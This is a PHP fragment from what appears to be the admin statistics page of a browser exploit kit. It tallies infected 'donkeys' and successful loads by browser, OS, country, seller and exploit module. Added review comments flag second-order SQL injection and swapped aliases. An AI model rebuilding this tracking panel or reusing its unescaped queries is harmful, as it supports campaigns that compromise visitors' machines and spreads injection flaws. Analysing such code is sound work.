        $Test->setFontProperties("./secure/tahoma.ttf",6);
        $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
        $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
        $Test->setFontProperties("./secure/tahoma.ttf",8);
        $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
        $Test->Render("./secure/files/country.png");
        header("Content-type: image/png");
        echo file_get_contents("./secure/files/country.png");
        unlink("./secure/files/country.png");
        exit();
    }

    // --- Seller filter drop-down for the statistics page ---
    $selleroptions = "";
    $result = mysql_query("SELECT `id`, `name` FROM `sellers` ORDER BY `id` ASC");
    while ($row = mysql_fetch_array($result)){
        $selleroptions .= "<option value='" . $row['id'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] == $row['id']) ? " selected" : "") . ">" . $row['name'] . "</option>";
    }

    // --- Browser table, with a per-browser version breakdown (top 10) ---
    $result = mysql_query("SELECT `browser`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser` ORDER BY `loaded` DESC, `all` DESC");
    $browsers = array();
    $browsers['browser'] = array();
    $browsers_versions = array();
    $i = 0;
    while ($row = mysql_fetch_array($result)){
        $browsers['browser'][$i] = $row['browser'];
        $browsers['all'][$i] = $row['all'];
        $browsers['frags'][$i] = $row['loaded'];
        $z = 0;
        // NOTE(review): $row['browser'] is read back from the database and
        // concatenated into SQL without escaping. Where `donkeys`.`browser` is
        // populated is outside this listing; if it can hold client-supplied
        // text this is a second-order SQL injection sink — TODO confirm
        // against the code that inserts into `donkeys`.
        $result2 = mysql_query("SELECT `browser_version` AS `version`, SUM(1) AS `sum`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `frags` FROM `donkeys` WHERE `browser` = '" . $row['browser'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser_version` ORDER BY `frags` DESC, `sum` DESC LIMIT 10");
        while ($row2 = mysql_fetch_array($result2)){
            $browsers_versions[$row['browser']]['version'][$z] = $row2['version'];
            $browsers_versions[$row['browser']]['sum'][$z] = $row2['sum'];
            $browsers_versions[$row['browser']]['frags'][$z] = $row2['frags'];
            $z++;
        }
        $i++;
    }

    // --- OS table, with a per-OS version breakdown (top 10) ---
    $result = mysql_query("SELECT `os`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os` ORDER BY `loaded` DESC, `all` DESC");
    $oss = array();
    $oss['os'] = array();
    $oss_versions = array();
    $i = 0;
    while ($row = mysql_fetch_array($result)){
        $oss['os'][$i] = $row['os'];
        $oss['all'][$i] = $row['all'];
        $oss['frags'][$i] = $row['loaded'];
        $z = 0;
        // NOTE(review): same pattern as the browser breakdown — $row['os'] is
        // concatenated into SQL unescaped.
        $result2 = mysql_query("SELECT `os_version` AS `version`, SUM(1) AS `sum`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `frags` FROM `donkeys` WHERE `os` = '" . $row['os'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os_version` ORDER BY `frags` DESC LIMIT 10");
        while ($row2 = mysql_fetch_array($result2)){
            $oss_versions[$row['os']]['version'][$z] = $row2['version'];
            $oss_versions[$row['os']]['sum'][$z] = $row2['sum'];
            $oss_versions[$row['os']]['frags'][$z] = $row2['frags'];
            $z++;
        }
        $i++;
    }

    // --- Country table (top 10); values stay numeric here ---
    $result = mysql_query("SELECT `country`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `country` ORDER BY `loaded` DESC, `all` DESC LIMIT 10");
    $countrys = array();
    $countrys['country'] = array();
    $i = 0;
    while ($row = mysql_fetch_array($result)){
        $countrys['country'][$i] = $row['country'];
        $countrys['all'][$i] = $row['all'];
        $countrys['frags'][$i] = $row['loaded'];
        $i++;
    }

    // --- Per-module table ---
    $explarray = array();
    $exploitsdir = scandir("./secure/exploits");
    for ($i = 0; $i < count($exploitsdir); $i++){
        if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
            list($name) = explode(".", $exploitsdir[$i]);
            list($id, $namee) = explode("-", $name);
            $explarray[$id] = $namee;
        }
    }
    // NOTE(review): the aliases are swapped relative to the chart query above:
    // here `loaded` is the row count and `all` is the BACKCONNECT count, and
    // they are then stored under 'frags' and 'all' respectively.
    $result = mysql_query("SELECT `exploit`, SUM(1) AS `loaded`, SUM(`status` = 'BACKCONNECT') AS `all` FROM `donkeys` WHERE `status` <> 'NOT'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `exploit` ORDER BY `all` DESC, `loaded` DESC");
    $exploit = array();
    $exploit['exploit'] = array();
    $i = 0;
    while ($row = mysql_fetch_array($result)){
        $exploit['exploit'][$i] = ($row['exploit'] == 0) ? "OTHER" : $explarray[$row['exploit']];
        $exploit['all'][$i] = $row['all'];
        $exploit['frags'][$i] = $row['loaded'];
        $i++;
    }


    include("./secure/templates/" . $_SESSION['language'] . "/admin_statistics.php");
}
// Reached by every branch that did not exit(): include the shared admin
// template (its path again built from the session language) and close the
// database connection.
include("./secure/templates/" . $_SESSION['language'] . "/admin.php");
mysql_close();

?>